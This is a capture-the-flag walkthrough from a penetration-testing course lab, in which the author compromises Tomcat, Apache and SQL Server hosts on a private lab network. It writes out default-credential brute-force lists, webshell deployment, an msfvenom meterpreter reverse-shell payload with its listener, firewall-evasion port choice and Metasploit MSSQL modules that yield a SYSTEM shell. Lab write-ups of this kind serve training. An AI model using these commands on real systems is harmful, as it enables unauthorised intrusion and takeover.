Here we go.
First CTF from eLearnSecurity's PTS course.
[Apache Tomcat, SQL Server]
Connected to internal network via eth0.
Task: find flags on all hosts connected to network.
⇒ Tools used: Nmap, Dirb, Netcat & Metasploit (MSFvenom, MSFpayload & Listener for reverse TCP shell)
Stage I - Information Gathering:
was ommitted since we're inside the network and no OSINT or public sites search would be relevant here. If anything subdomain enumeration with sublist3r / amass would have made sense though. Next time.
Stage II - Footprinting and Scanning:
Mapping the network with Nmap.
root@0xBlackhat:~ # nmap -sn 172.16.64.0/24 -oN discovery.nmap
-oN for default output format, redirect with > discovery.nmap would do of course but with this command we actually see the output on the screen. Alternatively fping works, but it won't output anything directly:
fping -a -g 172.16.64.0/24 2>null > test.nmap
root@0xBlackhat:~# cat discovery.nmap | grep for | grep -v “\.10” | cut -d “ ” -f 5 > ipscan.txt
Sorts the discovered addresses, excludes your own IP and writes the rest to a file. ipscan.txt will now be fed to nmap to perform full TCP scan:
root@0xBlackhat:~# nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
Nmap scan report for 172.16.64.199 Host is up (0.067s latency). Not shown: 65433 closed ports, 90 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM | ms-sql-ntlm-info: | Target_Name: WIN10 | NetBIOS_Domain_Name: WIN10 | NetBIOS_Computer_Name: WIN10 | DNS_Domain_Name: WIN10 | DNS_Computer_Name: WIN10 |_ Product_Version: 10.0.10586 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2021-02-08T22:15:06 | Not valid after: 2051-02-08T22:15:06 | MD5: a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa |_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307 |_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time. 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49943/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000 | ms-sql-ntlm-info: | Target_Name: WIN10 | NetBIOS_Domain_Name: WIN10 | NetBIOS_Computer_Name: WIN10 | DNS_Domain_Name: WIN10 | DNS_Computer_Name: WIN10 |_ Product_Version: 10.0.10586 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2021-02-08T22:15:06 | Not valid after: 2051-02-08T22:15:06 | MD5: a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa |_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307 |_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | ms-sql-info: | 172.16.64.199:1433: | Version: | name: Microsoft SQL Server 2014 RTM | number: 12.00.2000.00 | Product: Microsoft SQL Server 2014 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:87:d9:d5 (VMware) | Names: | WIN10<00> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ WIN10<20> Flags: <unique><active> | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-11T01:13:38 |_ start_date: 2021-02-08T22:14:56
Victim 1: Apache Tomcat
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: | Supported Methods: GET HEAD POST PUT DELETE OPTIONS |_ Potentially risky methods: PUT DELETE |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache2 Ubuntu Default Page: It works 9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: | Supported Methods: GET HEAD POST PUT DELETE OPTIONS |_ Potentially risky methods: PUT DELETE |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache2 Ubuntu Default Page: It works 59919/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's identify and exploit any Tomcat misconfigurations we can find.
If you go to the default directory /manager/html for the admin panel use the default credentials. Someone posted the list on GitHub: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown You can use a bash script to get the hashes like this:
$ for cred in $(cat /home/user/directory/sub_directory/tomcat_userpass.txt); do echo -n $cred | base64; done
which will generate this list here:
YWRtaW46cGFzc3dvcmQ= YWRtaW46 YWRtaW46UGFzc3dvcmQx YWRtaW46cGFzc3dvcmQx YWRtaW46YWRtaW4= YWRtaW46dG9tY2F0 Ym90aDp0b21jYXQ= bWFuYWdlcjptYW5hZ2Vy cm9sZTE6cm9sZTE= cm9sZTE6dG9tY2F0 cm9sZTpjaGFuZ2V0aGlz cm9vdDpQYXNzd29yZDE= cm9vdDpjaGFuZ2V0aGlz cm9vdDpwYXNzd29yZA== cm9vdDpwYXNzd29yZDE= cm9vdDpyMDB0 cm9vdDpyb290 cm9vdDp0b29y dG9tY2F0OnRvbWNhdA== dG9tY2F0OnMzY3JldA== dG9tY2F0OnBhc3N3b3JkMQ== dG9tY2F0OnBhc3N3b3Jk dG9tY2F0Og== dG9tY2F0OmFkbWlu dG9tY2F0OmNoYW5nZXRoaXM=
ou can then go ahead and use it with BurpSuite's Intruder: Payload type Sniper. Remember to uncheck the URL box.
Somehow Metasploit's bruteforcing with wordlists doesn't work, even if you slow it down. Not a big deal, you can just try your luck manually which actually worked instantly for me using tomcat:s3cret. If I remember correctly their 403 even suggests that combination lol
Ok, so now you have user access to the server. Good enough to upload and deploy files. Tomcat is a java application server and works with WAR files. Fortunately, someone uploaded a war webshell to GitHub. Using our tomcat:s3cret user we go ahead and deploy the websell manually. https://github.com/BustedSec/webshell/blob/master/webshell.war
Now clicking /webshell should be enough to direct us to the webshell. In case it doesn't work straight away append ‘/index.jsp' to the url as follows:
Great, now we have a user and a shell. Let's go ahead and obtain a reverse shell to obtain root with Metasploit payloads, the reverse tcp shell will help us to bypass the firewall. Meterpreter war payloads don't work for some reason so you can create a Metasploit listener as follows:
use exploit/multi/handler set payload linux/x64/meterpreter_reverse_tcp set lhost 172.16.64.10 set lport 59919 run
port 59919 is open on the victim which is why we use this port. A different port would make the firewall fire up alarms, that's why we listen on this port which is open on the victim machine.
Generate the executable with MSFvenom as follows:
root@0xBlackhat:~ # msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=172.16.64.10 lport=59919 -f elf -o meter
Now let's rename the file to meter.war making it a fake war file, it won't change our malicious file but it will allow us to deploy it on the victim machine:
root@0xBlackhat:~ # mv meter meter.war
et's now deploy this file as we previously did with the webshell on the /manager/html page. Deployment won't work, but it's still a valid executable and it's on the server now. All we want.
We rename meter.war through the webshell as follows:
root@0xBlackhat:~ # mv var/lib/tomcat8/webapps/meter.war /tmp/meter root@0xBlackhat:~ # ls /tmp/meter root@0xBlackhat:~ # chmod +x /tmp/meter
And we run as follows:
root@0xBlackhat:~ # /tmp/meter
And voila, a new meterpreter session opens up in our terminal. getuid shows we're in. Now it's about surfing the directories which you can and should enumerate. I didn't however, also don't remember where exactly the flag was I think somewhere in /home/user/admin directory or similar.
port 80/tcp open, Apache httpd 2.4.18 (Ubuntu)
So let's enumerate directories with dirb and see what we find.
root@0xBlackhat:~ # dirb http://172.16.64.140
using worlist /usr/share/dirb/wordlists/common.txt
After a while http://172.16.64.140/project/ shows up, let's try admin:admin. Default credentials again and we're in. Now, let's dirb with credentials this time to get a scan with access rights.
root@0xBlackhat:~ # dirb http://172.16.64.140/project -u admin:admin
This will eventually give us a couple more directories to browse and inspect.
One of those contains the credentials to access the SQL Server in the network.
It's also the flag we needed to find.
The SQL Server. Since we already have the credentials it's not too much of a drama.
We can use Metasploit for this, loading mssql_login module
use auxiliary/scanner/mssql/mssql_login set rhosts 172.16.64.199 set rport 1433 set username fooadmin set password fooadmin set verbose true run
Metaploit's mssql_enum module helps us automate reconnaissance
use auxiliary/admin/mssql/mssql_enum set password fooadmin set username fooadmin set rport 1433 set rhosts 172.16.64.199 run
This is the part that takes some time going through the displayed results. We get a lot of information about the database.
We see e.g. that the account is indeed an system account so we can use this to compromise the server with the mssql_payload module:
use exploit/windows/mssql/mssql_payload set password fooadmin set user fooadmin set srvport 53 set rhosts 172.16.64.199 set payload windows/x64/meterpreter_reverse_tcp set lhost 172.16.64.13 set lport 443 run
This will upload the payload and a meterpreter session will open in terminal.
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
Let's spawn a shell and look for the flag
C:\ shell C:\ cd c:\Users C: \dir
And that's it. In one of those folders is the last flag.